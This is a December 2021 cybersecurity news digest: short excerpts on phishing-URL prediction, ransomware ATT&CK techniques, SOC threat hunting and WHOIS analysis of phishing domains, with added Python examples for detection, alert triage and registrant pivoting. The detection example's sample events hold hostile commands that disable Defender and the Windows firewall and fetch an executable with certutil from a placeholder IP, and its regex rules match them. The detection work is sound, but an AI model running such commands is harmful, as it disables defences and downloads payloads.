Table of Contents
- Innovative scanner that can intelligently predict malicious domains, URLs
- 5 Common Ransomware ATT&CK Techniques
- Honeywell opens security operations center in Europe, based in Romania
- The Insider Threat: Best Practices for Detection, Monitoring, and Prevention
- How a modern SOC can make your threat hunting smarter
- Shoreline.io Reinvents Runbooks with Industry’s First Purpose-Built Notebooks for On-Call Operations
- Security study finds a few best practices can have a big impact on threat protection
- Digging Up Zombie Domains: 3,800 Phishing Hosts
- Trend Micro Crowns Champions of 2021 Capture the Flag Competition
- Shifting security further left: DevSecOps becoming SecDevOps
- Gas stations and beyond: Why cybersecurity is a top priority for industrial infrastructure
- LogicMonitor Launches Australian Data Centre
- Wipro To Acquire Cybersecurity Firm Edgile For $230M
- Forrester TEI: Cybersixgill can deliver 311% ROI, enabling enterprises to scale dark web threat intelligence while closing the knowledge gaps
- Introducing DARTH: Distributed Analysis for Research and Threat Hunting
- Cybint brings Cyber Impact Bootcamp to over a dozen US colleges and universities to build back better education
Innovative scanner that can intelligently predict malicious domains, URLs
Qatar Tribune
A cyber security team at Hamad Bin Khalifa University (HBKU)’s Qatar Computing Research Institute (QCRI) has designed and patented a technology that not only detects currently malicious phishing URLs but can also predict those that will become malicious in the future.
The Bfore.AI Pre-Crime scanner was developed using QCRI’s licensed malicious URL prediction technology.
Based on its capabilities, the scanner was selected by VirusTotal to be one of its trusted scanners.
VirusTotal (virustotal.com) is a publicly available cyber security scanning service from Google that allows a user to check if a URL, file, or IP address is malicious or benign.
By carefully establishing and analyzing associations among URLs, the QCRI team was able to discover a large number of previously unknown malicious URLs.
This approach utilizes public data and does not create any privacy concerns.
Extensive testing of the approach demonstrated the early detection of malicious URLs.
The approach also enables large-scale detection of malicious URLs and is highly efficient and scalable.
Link: https://www.qatar-tribune.com/news-details/id/225822
5 Common Ransomware ATT&CK Techniques
Insikt Group
Recorded Future
The ATT&CK techniques highlighted in this research align with Insikt Group’s 2020 Top MITRE ATT&CK Techniques report, where the Defense Evasion tactic was the most commonly seen tactic in 2020.
The 5 ransomware techniques detailed in this report are as follows:
- 3 techniques from the Defense Evasion tactic: Disable or Modify Tools (T1562.001), Disable or Modify System Firewall (T1562.004), and Pre-OS Boot (T1542)
- 1 technique from the Command and Control tactic: Ingress Tool Transfer (T1105)
- 1 technique from the Privilege Escalation tactic: Group Policy Modification (T1484.001)
Key Judgments
Ransomware operators continue to focus on developing techniques to evade defenses, aligning with Insikt Group’s 2020 Top MITRE ATT&CK Techniques report.
Sigma rules focused on particular TTPs used by threat actors can detect malicious behavior before the deployment of ransomware in many cases.
Sigma rules aligned with MITRE ATT&CK can help organizations define mitigations based on specific threat actor TTPs.
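To make the second and third key judgments concrete, here is an added Python matcher (not code from the Insikt Group report, and not the Sigma rules it ships) that applies hand-written, Sigma-style selections for four of the five techniques to constructed Sysmon process-creation and Windows Security directory-service events. The rule logic approximates public Sigma rules rather than reproducing them, all events are constructed, and Pre-OS Boot is left out because detecting it needs firmware or boot-integrity telemetry rather than process or directory logs.

```python
import re

# Hand-written, Sigma-style rules (assumption: they approximate, not reproduce,
# public Sigma rules). Each selection maps an event field to regexes that must
# ALL match, case-insensitively, mirroring Sigma's "contains|all" modifier.
RULES = [
    {
        "title": "Defender real-time monitoring disabled via PowerShell",
        "attack": "T1562.001 Disable or Modify Tools",
        "logsource": "process_creation",
        "selection": {
            "CommandLine": [r"set-mppreference", r"-disablerealtimemonitoring\s+\$?true"],
        },
    },
    {
        "title": "Windows Firewall disabled via netsh",
        "attack": "T1562.004 Disable or Modify System Firewall",
        "logsource": "process_creation",
        "selection": {
            "Image": [r"\\netsh\.exe$"],
            "CommandLine": [r"advfirewall", r"state\s+off"],
        },
    },
    {
        "title": "certutil used to fetch a remote file",
        "attack": "T1105 Ingress Tool Transfer",
        "logsource": "process_creation",
        "selection": {
            "Image": [r"\\certutil\.exe$"],
            "CommandLine": [r"-urlcache", r"https?://"],
        },
    },
    {
        "title": "GPO version number changed in Active Directory",
        "attack": "T1484.001 Group Policy Modification",
        "logsource": "security",
        "selection": {
            "EventID": [r"^5136$"],
            "ObjectClass": [r"^groupPolicyContainer$"],
            "AttributeLDAPDisplayName": [r"^versionNumber$"],
        },
    },
]


def rule_matches(rule, event):
    """True when the event comes from the rule's log source and every
    selected field satisfies all of its patterns."""
    if event.get("logsource") != rule["logsource"]:
        return False
    for field, patterns in rule["selection"].items():
        value = str(event.get(field, ""))
        if not all(re.search(p, value, re.IGNORECASE) for p in patterns):
            return False
    return True


def run_detections(events, rules=RULES):
    """Return (event index, rule title, ATT&CK technique) for every hit."""
    return [
        (i, rule["title"], rule["attack"])
        for i, event in enumerate(events)
        for rule in rules
        if rule_matches(rule, event)
    ]


# Constructed sample events (not real telemetry). Indices are named in the
# comments so the expected hits are easy to check.
SAMPLE_EVENTS = [
    # 0: Defender switched off from PowerShell -> T1562.001
    {"logsource": "process_creation",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": 'powershell.exe -nop -c "Set-MpPreference -DisableRealtimeMonitoring $true"'},
    # 1: firewall disabled for every profile -> T1562.004
    {"logsource": "process_creation",
     "Image": r"C:\Windows\System32\netsh.exe",
     "CommandLine": "netsh advfirewall set allprofiles state off"},
    # 2: certutil download cradle -> T1105
    {"logsource": "process_creation",
     "Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": r"certutil.exe -urlcache -split -f http://203.0.113.10/p.exe C:\Users\Public\p.exe"},
    # 3: benign certutil use, no URL -> no hit
    {"logsource": "process_creation",
     "Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": r"certutil.exe -hashfile C:\Users\Public\report.pdf SHA256"},
    # 4: GPO version bump recorded by a domain controller -> T1484.001
    {"logsource": "security", "EventID": 5136,
     "ObjectClass": "groupPolicyContainer",
     "AttributeLDAPDisplayName": "versionNumber",
     "ObjectDN": "CN={31B2F340-016D-11D2-945F-00C04FB984F9},CN=Policies,CN=System,DC=example,DC=com"},
    # 5: unrelated directory change -> no hit
    {"logsource": "security", "EventID": 5136,
     "ObjectClass": "user", "AttributeLDAPDisplayName": "description"},
]

if __name__ == "__main__":
    for idx, title, technique in run_detections(SAMPLE_EVENTS):
        print(f"event {idx}: {technique} <- {title}")
```

The point of the GPO rule is that Group Policy Modification shows up on the domain controller (event 5136 on a groupPolicyContainer object), not on the endpoint where the ransomware is later pushed, so the log source matters as much as the selection; the benign certutil event shows why the download rule requires both the -urlcache switch and a URL rather than the binary name alone.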
Link: https://www.recordedfuture.com/five-common-ransomware-techniques/
Honeywell opens security operations center in Europe, based in Romania
Help Net Security
Honeywell launched its first security operations center (SOC) in Europe, based in Romania.
The SOC focuses on operational technology (OT) cyber threat detection, prevention and management in industrial environments and critical infrastructure.
Link: https://www.helpnetsecurity.com/2021/12/17/honeywell-soc-romania/
The Insider Threat: Best Practices for Detection, Monitoring, and Prevention
ITs Mine Blog
As the old cliché goes, “you can’t build a great building without a sturdy foundation.” In the same vein, here are a few insider threat best practices that every organization should implement immediately:
- Mantraps to block unauthorized access to the property
- Multi-factor authentication for all employees
- Biometric measures to prevent impersonation
- Physical security around the building
- Organization-wide risk assessments
- Deactivating unused accounts
- Complex password policies
With these insider threat best practices in place, your organization has a greater chance of remaining breach-free in 2021 and beyond.
Remember this: the weakest link within an organization’s security system could be its employees, not the technology!
With BeyondDLP™, you have a comprehensive toolset that allows you to monitor, track, target, and block potential risks before they cause severe damage.
Our unparalleled FileGPS™ technology allows you to track, log and monitor your documents and data in real-time.
SoftwareMines™ are another powerful tool that prevent data breaches by detecting abnormal use of company data, whether from external attackers or insider threats (both malicious and unintentional).
Link: https://itsmine.io/resources/blog/the-insider-threat-best-practices-for-detection-monitoring-and-prevention/
How a modern SOC can make your threat hunting smarter
Kate Scarcella
Tech Beacon
Security operations centers are being overwhelmed by data.
Information from numerous sources—data from usage directories, asset inventory tools, geolocation tools, third-party threat intelligence databases, just to name a few—pour into the SOCs, where it’s expected to be crunched for possible threats that can be remedied by security analysts.
The funnel-and-crunch approach can also produce a boatload of alerts for analysts to investigate.
According to one Fortinet estimate (PDF), an analyst can expect to clear 20 to 25 alerts in a day.
Yet the average SOC receives 10,000 alerts a day.
For larger organizations, it’s even worse—upwards of 150,000 alerts a day.
When you consider how many of those alerts are false positives—around 50%—and how many lack severity, it’s easy to understand why there can be a lot of analyst churn in SOCs—anywhere from 10% to 50%, according to Help Net Security—and why there’s little time for threat hunting.
According to a 2019 survey by the SANS Institute, 14% of organizations pegged the time between compromise and detection at from one to six months.
Adding to a SOC’s data woes is the Internet of Things.
There can be thousands of those devices feeding data into the SOC, turning a data pool into a data swamp.
If any of those devices are compromised, it is nearly impossible for a security team to discover it in time to make a difference by using the common approaches of data collection and analysis.
A system with intelligent agents on the IoT devices can also nip threats in the bud through application whitelisting, preventing unauthorized data modification on the device, and controlling data flow integrity, making sure executables run correctly.
What’s more, machine learning and analytics can profile devices; they essentially create a unique fingerprint for each one.
Data from the devices can be enriched in real time and given context, which can make a SOC and threat hunters more effective.
Threat intelligence context can be used to enhance detection analytics, improving a SIEM’s ability to identify threats.
It can also be used to boost a threat’s risk score, prioritizing higher-risk threats for investigation.
By using endpoint detection and response (EDR) as a primary source of data, threat hunters can receive a handful of quality leads about potential malicious activity in their environment.
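As an added sketch of the enrichment and prioritization this section describes (my code, not TechBeacon’s or any vendor’s), the following Python takes a few constructed EDR alerts, attaches matching threat-intelligence context and asset criticality, boosts a base severity score by indicator confidence, and returns a prioritized queue. The feed, asset list, weights and threshold are all assumptions chosen for illustration.

```python
# Constructed threat-intelligence feed: indicator -> (confidence 0-100, context).
THREAT_INTEL = {
    "203.0.113.45": (90, "known ransomware C2 address"),
    "update-cdn.example.net": (60, "domain used in a phishing lure"),
}

# Constructed asset inventory: host -> criticality multiplier (assumed weights).
ASSET_CRITICALITY = {"dc01": 3.0, "fileserver02": 2.0, "laptop-117": 1.0}

# Base score from the EDR's own severity (assumed scale).
BASE_SCORE = {"low": 10, "medium": 30, "high": 60, "critical": 80}
TI_WEIGHT = 0.5  # fraction of the strongest indicator confidence added to the score


def enrich(alert):
    """Return a copy of the alert with TI hits and asset context attached."""
    enriched = dict(alert)
    enriched["ti_hits"] = [
        {"indicator": ioc, "confidence": THREAT_INTEL[ioc][0], "context": THREAT_INTEL[ioc][1]}
        for ioc in alert.get("indicators", [])
        if ioc in THREAT_INTEL
    ]
    enriched["asset_criticality"] = ASSET_CRITICALITY.get(alert["host"], 1.0)
    return enriched


def risk_score(enriched):
    """Severity base, boosted by the strongest TI hit, scaled by asset value, capped at 100."""
    score = BASE_SCORE[enriched["severity"]]
    if enriched["ti_hits"]:
        score += TI_WEIGHT * max(h["confidence"] for h in enriched["ti_hits"])
    score *= enriched["asset_criticality"]
    return min(round(score), 100)


def triage(alerts, threshold=50):
    """Enrich and score every alert; return (all scored, those at or above the
    threshold), both ordered highest risk first with ties broken by alert id."""
    scored = []
    for alert in alerts:
        e = enrich(alert)
        e["risk"] = risk_score(e)
        scored.append(e)
    scored.sort(key=lambda e: (-e["risk"], e["id"]))
    return scored, [e for e in scored if e["risk"] >= threshold]


# Constructed EDR alerts (not real telemetry).
SAMPLE_ALERTS = [
    {"id": "A1", "host": "laptop-117", "severity": "medium",
     "title": "PowerShell download cradle", "indicators": ["update-cdn.example.net"]},
    {"id": "A2", "host": "dc01", "severity": "medium",
     "title": "Outbound connection from lsass.exe", "indicators": ["203.0.113.45"]},
    {"id": "A3", "host": "fileserver02", "severity": "low",
     "title": "New scheduled task created", "indicators": []},
    {"id": "A4", "host": "laptop-117", "severity": "high",
     "title": "Mass file rename with unusual extension", "indicators": []},
]

if __name__ == "__main__":
    _, queue = triage(SAMPLE_ALERTS)
    for e in queue:
        print(e["id"], e["risk"], e["title"], [h["context"] for h in e["ti_hits"]])
```

With these weights the medium-severity alert on the domain controller that matches a C2 indicator lands at the top of the queue, ahead of the high-severity alert on a laptop that has no intelligence context, which is exactly the reordering the text argues for. The weights and threshold are the tunable part: set them from your own false-positive history rather than from this example.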
Link: https://techbeacon.com/security/how-modern-soc-can-make-your-threat-hunting-smarter
Shoreline.io Reinvents Runbooks with Industry’s First Purpose-Built Notebooks for On-Call Operations
Globe Newswire
REDWOOD CITY, Calif., Dec. 15, 2021 (GLOBE NEWSWIRE) — Shoreline.io, the Incident Automation company, today introduced Shoreline Notebooks, the first purpose-built notebooks for debugging and repairing production infrastructure.
Shoreline is reinventing the runbook, transforming static documents into live notebooks that contain real-time debug data and pre-approved repair activities.
With a web-based UI, Shoreline Notebooks automatically capture and then share best practice debug and remediation sessions.
Notebooks can also be tied to alarms, making it easy for on-call teams to quickly and safely resolve incidents.
“Just as Jupyter Notebooks transformed data science, Shoreline Notebooks are transforming on-call operations,” said Anurag Gupta, founder and CEO of Shoreline. “Our Notebooks make it easier to onboard new team members and to safely empower everyone on-call.”
Shoreline Notebooks are each individually launched by their own specific alarm, so there’s no more thumbing through a dense document to find the relevant section.
Link: https://www.globenewswire.com/news-release/2021/12/15/2352762/0/en/Shoreline-io-Reinvents-Runbooks-with-Industry-s-First-Purpose-Built-Notebooks-for-On-Call-Operations.html?f=22&fvtc=5&fvtv=32464777
Security study finds a few best practices can have a big impact on threat protection
Zk Research
Silicon Angle
Cisco Systems Inc. just released one of its largest-ever cybersecurity studies, providing a detailed view into the top five security practices proven to be most effective for organizations.
Cisco claims that those adopting the top practices can propel their security programs ahead of 79% of other organizations.
Cisco uncovered that across the 25 security practices it analyzed, five stood out from the rest: technology refresh, threat detection, disaster recovery, incident response and security product integration.
Considering 39% of security technologies used by organizations are antiquated, proactively refreshing outdated technology is at the top of the list of key security practices.
Cisco’s new study found organizations with modern, consolidated, cloud-based architectures are more than twice as likely to have strong tech refresh capabilities as those using outdated, distributed, on-premises systems.
This is a problem I see accelerating over the next few years.
The belief that frequent upgrades help security is proven out in the survey data.
Organizations that upgrade IT and security technologies quarterly are 30% better at keeping up with their business than organizations upgrading every few years.
The main drivers for refreshing security technologies are vendor-led (determined by providers), proactive (based on a predetermined schedule) or reactive (in response to an incident).
Nearly 66% of organizations that sync with vendor refresh cycles report strong capabilities.
The reactive approach to upgrades does put businesses at risk because it is often akin to closing the barn door after the horses have escaped.
A good example of this is zero trust.
In this recent SiliconANGLE post, I discussed how that technology could have minimized the damage from Log4j.
Zero trust has been available for a while and companies that were proactive are likely in a better place than ones that were not.
More than three-quarters of professionals surveyed in the study would rather buy integrated solutions than build them.
Organizations that stick with a preferred vendor are about twice as likely to achieve well-integrated security technologies as those taking a hands-off approach.
Furthermore, organizations with highly integrated systems for identifying critical assets and risks are more than 41% better at threat detection and response.
Developing threat detection and incident response capabilities are third and fourth on the top five list of key practices.
According to the study’s findings, most (92%) organizations with strong people, process and technology — the “p-p-t” pinnacle — achieve advanced threat detection and response capabilities.
This translates into 3.5 times greater performance for threat detection and response over organizations that lack p-p-t.
Organizations that conduct threat detection/response activities such as testing and updating, as well as proactively hunting and engaging in team exercises at least on a weekly basis, experience 30% greater performance compared with those that do them annually or less.
Additionally, organizations that make extensive use of threat intelligence are nearly twice as likely to report strong detection and response capabilities compared to those with lower usage.
Link: https://siliconangle.com/2021/12/19/security-study-finds-best-practices-can-big-impact-threat-protection/
Digging Up Zombie Domains: 3,800 Phishing Hosts
Jonathan Zhang
Cybercrime Magazine
Historical WHOIS information can uncover investigative breadcrumbs that are otherwise hidden
Researchers at WhoisXML API performed a digital footprinting analysis of more than 3,800 verified phishing hosts using historical WHOIS data.
The key findings of our downloadable white paper “Digging Up Zombie Domains: What WHOIS History Reveals about 3,800+ Verified Phishing Hosts” include the following:
- Phishing hosts can be both new and old domains, though our data shows that around 51 percent of them were more than a year old when they were reported on PhishTank.
- A quarter of them were created more than a decade ago.
- Available domains may have a malicious past.
- About 46 percent of the phishing hosts are available for registration despite having been used by threat actors between March 1 and May 31, 2020.
- The breadcrumbs the phishing domains left, found through WHOIS history checks, led us to more than 5,000 additional potentially risky or suspicious domains.
- All TLDs, regardless of registry and registrar, are prone to abuse.
- The phishing hosts in our study mostly fell under .com, .net, .co, .ru, and .org.
- Of the 3,870 unique phishing hosts PhishTank verified in June 2020, WHOIS history checks uncovered 1,421 unique registrant email addresses used when the domains were first created.
- More than half of them were unredacted, possibly since they were registered prior to the implementation and global repercussions of the General Data Protection Regulation (GDPR).
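To make the pivot concrete, here is an added Python sketch (not WhoisXML API’s code or data) that computes the age-at-report and registrant-redaction statistics above over a few constructed WHOIS history records, then follows the breadcrumbs by pivoting on the unredacted registrant emails through a constructed historical WHOIS index to surface additional domains to investigate. The records, emails and index are made up for the example; the redaction markers are an assumption about how privacy-protected WHOIS records commonly appear.

```python
from collections import Counter, defaultdict
from datetime import date

# Assumption: privacy-protected WHOIS records carry one of these markers in
# the registrant field instead of a real address.
REDACTION_MARKERS = ("redacted", "privacy", "withheld")


def is_redacted(registrant: str) -> bool:
    r = registrant.lower()
    return "@" not in r or any(m in r for m in REDACTION_MARKERS)


def tld(domain: str) -> str:
    return domain.rsplit(".", 1)[-1].lower()


def age_days_at_report(record) -> int:
    """Domain age, in days, on the day it was reported as a phishing host."""
    return (record["reported"] - record["created"]).days


def summarize(records):
    """Age, TLD and registrant statistics of the kind the white paper reports."""
    n = len(records)
    older_than_year = sum(age_days_at_report(r) > 365 for r in records)
    older_than_decade = sum(age_days_at_report(r) > 3652 for r in records)
    unredacted = [r["registrant"] for r in records if not is_redacted(r["registrant"])]
    return {
        "hosts": n,
        "pct_older_than_1y": round(100 * older_than_year / n),
        "pct_older_than_10y": round(100 * older_than_decade / n),
        "pct_unredacted": round(100 * len(unredacted) / n),
        "unique_registrants": len(set(unredacted)),
        "tld_counts": dict(Counter(tld(r["domain"]) for r in records)),
    }


def pivot_on_registrants(records, whois_index):
    """Follow the breadcrumb: for each unredacted registrant email, return the
    other domains it registered (per a historical WHOIS index) that are not
    already in the phishing set."""
    known = {r["domain"] for r in records}
    leads = defaultdict(set)
    for r in records:
        email = r["registrant"]
        if not is_redacted(email):
            leads[email] |= whois_index.get(email, set()) - known
    return {email: sorted(domains) for email, domains in leads.items() if domains}


# Constructed sample records (illustrative only; not the study's data).
SAMPLE_RECORDS = [
    {"domain": "login-verify-example.com", "created": date(2020, 4, 2),
     "registrant": "REDACTED FOR PRIVACY", "reported": date(2020, 4, 5)},
    {"domain": "oldshop-example.net", "created": date(2009, 6, 11),
     "registrant": "ops@mailbox.example", "reported": date(2020, 5, 20)},
    {"domain": "example-secure-pay.co", "created": date(2016, 1, 30),
     "registrant": "ops@mailbox.example", "reported": date(2020, 3, 14)},
    {"domain": "example-portal.org", "created": date(2019, 12, 1),
     "registrant": "someone@mail.example", "reported": date(2020, 5, 2)},
]

# Constructed historical WHOIS index: registrant email -> every domain ever
# registered with it (what a WHOIS-history lookup would return).
SAMPLE_WHOIS_INDEX = {
    "ops@mailbox.example": {"oldshop-example.net", "example-secure-pay.co",
                            "example-bank-alerts.com", "mail-example-update.net"},
    "someone@mail.example": {"example-portal.org"},
}

if __name__ == "__main__":
    print(summarize(SAMPLE_RECORDS))
    print(pivot_on_registrants(SAMPLE_RECORDS, SAMPLE_WHOIS_INDEX))
```

Two details matter in practice: the age must be measured at the report date, not today, or a “zombie” that was reported years ago looks older than it was when abused; and the pivot only yields leads where the registrant field was unredacted at creation time, which is why the white paper’s pre-GDPR registrations were the productive ones.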
Link: https://cybersecurityventures.com/digging-up-zombie-domains-3800-phishing-hosts/
Trend Micro Crowns Champions of 2021 Capture the Flag Competition
PR Newswire
Central Charts
DALLAS, Dec. 20, 2021 /PRNewswire/ — Trend Micro Incorporated (TYO: 4704; TSE: 4704), a global cybersecurity leader, today announced the winners of its long-running Capture the Flag Competition, who squared off in a virtual final this week.
This year’s final event saw 12 teams from 14 countries competing in a series of challenges related to critical issues in cybersecurity.
Like the 2020 event, this year’s competition featured two virtual rounds: an online qualifier running over a 24-hour period and the finals event.
Teams battled it out for the CTF crown on December 18-19 in a Dynamic Jeopardy competition.
The final results from the competition are as follows:
- First Place: PwnThyBytes (Romania)
- Second Place: Bad Guesser (China)
- Third Place: CodeRed (Korea)
Shifting security further left: DevSecOps becoming SecDevOps
Help Net Security
Veracode has revealed usage data that demonstrates cybersecurity is becoming more automated and componentized in line with modern software architectures and development practices.
The analysis of 5,446,170 static scans and more than 310,000 apps over a 13-month period from September 2020 to October 2021 found a startling 143 percent growth in the number of small apps, like APIs and microservices, and a 133 percent increase in automated scans run through APIs instead of manually.
Componentization drives speed and efficiencies
Alongside the upward trajectory in automation, Veracode also found a downward trend in the complexity and size of the code being analyzed, as evidenced by the 30% reduction in the average number of modules scanned per scan, indicating a shift toward scanning of individual components or microservices.
This is not surprising considering the rapid adoption of both componentized applications and DevOps practices.
Software cybersecurity must be pervasive, not invasive
With the rising cost and complexity of modern software development practices, businesses will increasingly require a comprehensive, fully integrated security platform with fewer disparate tools.
This platform supports pervasive, or continuous, security because it:
- Starts in the design phase
- Is fully integrated, but also open
- Delivers a frictionless developer experience
Link: https://www.helpnetsecurity.com/2021/12/20/cybersecurity-software-development/
Gas stations and beyond: Why cybersecurity is a top priority for industrial infrastructure
Backend News
Through our research, we managed to classify what could go wrong in this process.
There are several potential operational technology (OT) and IT security issues that can affect the work of the station.
The first group of risks involves potential remote access from external networks.
Just like many industrial systems today, the gas station employs solutions that are connected to public services through the internet; these include cloud banking systems and specialized fleet management systems.
Remote access to the fuel station allows further malicious actions inside the network.
There are also suppliers and service companies that have access to some parts of the infrastructure.
Compromising these third parties may open doors to the target system for attackers.
In fact, this type of threat is of great concern for companies of any size or profile: a third (32%) of large organizations suffered attacks involving data shared with suppliers.
What’s more, the financial impact of such incidents on enterprises is the highest across all types of attacks in 2021.
Another set of risks involves network and device issues that may potentially lead to the disruption of fuel station services or direct financial impact.
Attacks can come from remote networks or by connecting to wireless networks or wired network ports available onsite.
Another critical but evergreen problem is vulnerabilities or security flaws in the fuel controller, POS terminals, and network equipment, as well as corporate endpoints and applications.
In 2015, 5,800 automatic tank gauges (ATGs) were found to be exposed to unauthorized access from the internet because of a lack of password protection on a serial port.
An ATG is an electronic component placed in the tank that monitors the fuel level and checks whether the tank is leaking.
Through that same serial port, the ATG can be reprogrammed.
If the data it transfers is falsified, the operator will not be alerted to any deviation.
Figures from 2015 also suggested that at the time, most systems were in gas stations in the US and represented 3% of those used in the country.
By compromising such critical systems as automatic tank gauges, criminals can unlock options for fraud or even physical damage.
Another point to manage is wireless gateways and reader units.
A security assessment should be performed to identify insecure industrial protocols and the possibility of jamming and spoofing attacks.
Link: https://backendnews.net/gas-stations-and-beyond-why-cybersecurity-is-a-top-priority-for-industrial-infrastructure/
LogicMonitor Launches Australian Data Centre
APM Digest
LogicMonitor has launched its first Australian data centre, located in Sydney and locally hosted by cloud provider Amazon Web Services.
The launch will support ongoing growth in the Australian market while assisting with compliance measures needed for any work done in the financial and public sector spaces.
With this new data centre, regional customers’ data will be housed locally, meaning LogicMonitor’s lightweight, cloud-based platform will be faster than ever, improving overall customer experience.
Link: https://www.apmdigest.com/logicmonitor-launches-australian-data-centre
Wipro To Acquire Cybersecurity Firm Edgile For $230M
C.J. Fairfield
CRN
Global IT consulting powerhouse Wipro announced this week that it will pay $230 million to add cybersecurity muscle to its portfolio with the acquisition of Edgile.
Austin, Texas-based cybersecurity consulting provider Edgile focuses on risk and compliance, information and cloud security, and digital identity and partners with such tech giants as Microsoft, ServiceNow and SailPoint.
Edgile is focused on its core three service lines which are risk and compliance, identity and cloud security.
Link: https://www.crn.com/news/channel-programs/wipro-to-acquire-cybersecurity-firm-edgile-for-230m
Forrester TEI: Cybersixgill can deliver 311% ROI, enabling enterprises to scale dark web threat intelligence while closing the knowledge gaps
Meira Primes
Cyber Six Gill Blog
A recent Total Economic Impact (TEI) conducted by independent consulting firm Forrester has affirmed: organizations employing Cybersixgill products experienced benefits of almost $1.57, and a 311% return on investment.
“A small cybersecurity team, historically spending 40 hours per week collecting, analyzing, and understanding dark web data, can use Cybersixgill automation to reduce that to just a few hours per week.” – Cybersecurity Practice Manager
Key benefits of implementing and using Cybersixgill solutions:
- Cybersixgill provides savings of over $648,000 over three years in avoided staff expansion to meet growing threat intelligence business demand.
- Cybersixgill provides dark web data and the tools to analyze it with basic cybersecurity abilities.
- Cybersixgill offers savings in development, training, and licensing costs that add up to over $382,000 over three years.
Introducing DARTH: Distributed Analysis for Research and Threat Hunting
Meira Primes
VMware
As part of our research, we often find ourselves running new types of analysis on large collections of malicious samples; building a scalable and easy to extend infrastructure is therefore a functional requirement.
We decided to adopt (and extend) an analysis framework developed by researchers from Eurecom.
Research software provides reference implementations of novel approaches to security, but, at the same time, it is notorious for its lack of support, lack of documentation, and general fragility.
The DARTH Framework
The first challenge was to redesign the infrastructure to allow analysis modules to scale as necessary.
To achieve this goal, we split the framework into four different logical components so that each could run as a different Docker container:
- Commander: Interface where the user can submit samples and decide which analyses must be performed, and where the user can see the results of previous analyses.
- Scheduler: Responsible for scheduling worker tasks. It is also responsible for copying the sample to the chosen worker and returning the result to the commander once the analysis is complete.
- Worker: Responsible for the analysis of the sample.
- Database: Stores the samples’ metadata and the results of the various analyses.
These components are further orchestrated using Docker Swarm.
Link: https://blogs.vmware.com/networkvirtualization/2021/12/introducing-darth-distributed-analysis-for-research-and-threat-hunting.html/?utm_source=rss&utm_medium=rss&utm_campaign=introducing-darth-distrib
Cybint brings Cyber Impact Bootcamp to over a dozen US colleges and universities to build back better education
Cision PR Web
NEW YORK, Dec. 23, 2021 /PRNewswire/ — Cybint, the software-as-a-service arm of ThriveDX (TDX), a global digital education giant formerly known as HackerU, announces a major expansion in the U.S. through a series of partnerships with more than a dozen colleges and universities secured throughout 2021.
By bringing its cybersecurity bootcamp to learners of all backgrounds and education levels, it has made future-proof digital skills more accessible to the U.S. population amid a larger nation-wide legislative push for a more inclusive and tech-oriented education in the country.
Rebranding the bootcamp to Impact in the wake of Cybint’s acquisition by ThriveDX in August 2021, the company showcases its commitment to making a difference for the modern workforce.
In 2021, Cybint teamed up with multiple higher education partners across the U.S., including community colleges such as: Loras College, College of Eastern Idaho, Northeast Community College in Nebraska, Lincoln Land Community College, South Arkansas Community College, Manchester Community College, Ozarks Technical Community College, Central Texas College, and more.
Link: https://www.prnewswire.com/news-releases/cybint-brings-cyber-impact-bootcamp-to-over-a-dozen-us-colleges-and-universities-to-build-back-better-education-301450418.html